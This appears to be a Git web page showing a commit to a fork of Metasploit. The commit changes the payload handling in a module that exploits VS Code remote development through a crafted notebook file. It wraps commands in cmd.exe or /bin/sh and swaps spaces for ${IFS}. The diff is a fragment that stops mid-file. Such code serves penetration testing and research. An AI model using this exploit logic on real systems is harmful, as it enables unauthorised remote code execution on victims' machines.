adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

smcintyre-r7 recommendation for better payload handling

Browse Source
This commit is contained in:
h00die
2024-03-22 17:04:06 -04:00
parent f6b65993ac
commit 3da170a43c
1 changed files with 9 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
+9 -2
View File
@@ -95,9 +95,16 @@ class MetasploitModule < Msf::Exploit::Remote
def on_request_uri(cli, request)
super unless request.uri.end_with? datastore['URIPATH']
pload = %({"config":{"executable":"#{payload.encoded.split(' ')[0]}","args":"#{payload.encoded.split(' ')[1..].join(' ')}"}})
if target['Platform'] == 'win'
config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }
else
config = { 'executable' => '/bin/sh', 'args' => "-c #{payload.raw.gsub(' ', '${IFS}')}" }
end
pload = JSON.dump({ 'config' => config })
puts pload
pload = CGI.escape(pload).gsub('+', '%20')
pload = CGI.escape(pload).gsub('+', '%20') # XXX not suure if this is needed or not
ipynb = %|{
"cells": [